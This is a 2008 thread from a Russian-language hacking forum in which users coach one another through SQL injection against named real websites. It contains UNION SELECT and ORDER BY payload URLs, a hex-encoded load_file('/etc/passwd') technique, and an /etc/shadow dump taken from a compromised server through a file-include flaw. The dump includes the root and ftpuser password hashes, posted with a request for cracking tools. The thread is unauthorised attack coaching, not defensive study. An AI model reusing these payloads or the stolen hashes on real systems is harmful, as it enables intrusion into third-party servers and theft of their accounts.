ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2341  
Старый 14.06.2008, 14:42
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

sakh_rider
load_file('/etc/passwd') == load_file(0x272f6574632f70617373776427)
 
Ответить с цитированием

  #2342  
Старый 14.06.2008, 15:08
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

вообще то в хексе без ковычек)
 
Ответить с цитированием

  #2343  
Старый 14.06.2008, 20:22
Vid0k
Постоянный
Регистрация: 24.12.2007
Сообщений: 574
Провел на форуме:
3186852

Репутация: 316


Отправить сообщение для Vid0k с помощью ICQ
По умолчанию

чо делать вот с этим http://www.uniway.be/reference.aspx?id=221'
 
Ответить с цитированием

  #2344  
Старый 14.06.2008, 20:36
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

тут ничего нет, оно просто ругается на некорректный формат полученных данных
__________________
Не занимаюсь коммерцией в любых ее проявлениях.

Последний раз редактировалось l-l00K; 14.06.2008 в 20:38..
 
Ответить с цитированием

  #2345  
Старый 14.06.2008, 22:42
Vid0k
Постоянный
Регистрация: 24.12.2007
Сообщений: 574
Провел на форуме:
3186852

Репутация: 316


Отправить сообщение для Vid0k с помощью ICQ
По умолчанию

чот не могу подобрать кол-во столбцов уже дошел до 30
а при order by все время ошибка
Ошибка запроса:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1/*' at line 1
объясните что делаю не так???
http://www.kn.kz/articles.php?id=-274+union+select+order+by+1/*
 
Ответить с цитированием

  #2346  
Старый 14.06.2008, 23:22
Vid0k
Постоянный
Регистрация: 24.12.2007
Сообщений: 574
Провел на форуме:
3186852

Репутация: 316


Отправить сообщение для Vid0k с помощью ICQ
По умолчанию

ну подскажите(
c order by разобрался он мне говорит что там 3 столбца но при union select 1,2,3/*
выдает ошибку
Ошибка запроса:The used SELECT statements have a different number of columns
http://www.kn.kz/articles.php?id=-1+union+select+1,2,3/*

Последний раз редактировалось Vid0k; 14.06.2008 в 23:29..
 
Ответить с цитированием

  #2347  
Старый 14.06.2008, 23:52
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

Там к двум таблицам запрос, с разным числом колонок.
 
Ответить с цитированием

  #2348  
Старый 14.06.2008, 23:54
Vid0k
Постоянный
Регистрация: 24.12.2007
Сообщений: 574
Провел на форуме:
3186852

Репутация: 316


Отправить сообщение для Vid0k с помощью ICQ
По умолчанию

и что мне делать можно эту скулю расскрутить и как?
 
Ответить с цитированием

  #2349  
Старый 14.06.2008, 23:58
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

В этой может подзапросы прокатят. Попробуй другие бажные скрипты поискать. На крайний случай, в сканер загани.

Вот посмотри, может выйдет что.
Код HTML:
http://www.kn.kz/not_live_build.php?action=search&cityId=-2+union+select+0/*

Последний раз редактировалось .Begemot.; 15.06.2008 в 00:04..
 
Ответить с цитированием

  #2350  
Старый 15.06.2008, 00:38
Vid0k
Постоянный
Регистрация: 24.12.2007
Сообщений: 574
Провел на форуме:
3186852

Репутация: 316


Отправить сообщение для Vid0k с помощью ICQ
По умолчанию

у мя тут еще вопросик
нашел инклуд удалось прочитать etc/shadow
root:$1$8rIgCgQb$aAplIifRAaGkohCa4G1/8/:13773:0:99999:7:::
bin:*:13742:0:99999:7:::
daemon:*:13742:0:99999:7:::
adm:*:13742:0:99999:7:::
lp:*:13742:0:99999:7:::
sync:*:13742:0:99999:7:::
shutdown:*:13742:0:99999:7:::
halt:*:13742:0:99999:7:::
mail:*:13742:0:99999:7:::
news:*:13742:0:99999:7:::
uucp:*:13742:0:99999:7:::
operator:*:13742:0:99999:7:::
games:*:13742:0:99999:7:::
gopher:*:13742:0:99999:7:::
ftp:*:13742:0:99999:7:::
nobody:*:13742:0:99999:7:::
dbus:!!:13742:0:99999:7:::
vcsa:!!:13742:0:99999:7:::
rpm:!!:13742:0:99999:7:::
haldaemon:!!:13742:0:99999:7:::
netdump:!!:13742:0:99999:7:::
nscd:!!:13742:0:99999:7:::
sshd:!!:13742:0:99999:7:::
rpc:!!:13742:0:99999:7:::
rpcuser:!!:13742:0:99999:7:::
nfsnobody:!!:13742:0:99999:7:::
mailnull:!!:13742:0:99999:7:::
smmsp:!!:13742:0:99999:7:::
pcap:!!:13742:0:99999:7:::
apache:!!:13742:0:99999:7:::
webalizer:!!:13742:0:99999:7:::
xfs:!!:13742:0:99999:7:::
ntp:!!:13742:0:99999:7:::
pegasus:!!:13742:0:99999:7:::
named:!!:13742:0:99999:7:::
ftpuser:$1$PF7fe8Eh$rITd0IUQ1KF809DLIfH6H/:13742:0:99999:7:::
xat:!!:13745:0:99999:7:::
mysql:!!:13754::::::
посоветуйте прогу для расшифровки как я понимаю тут md5
потому что стоит префикс $1$?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ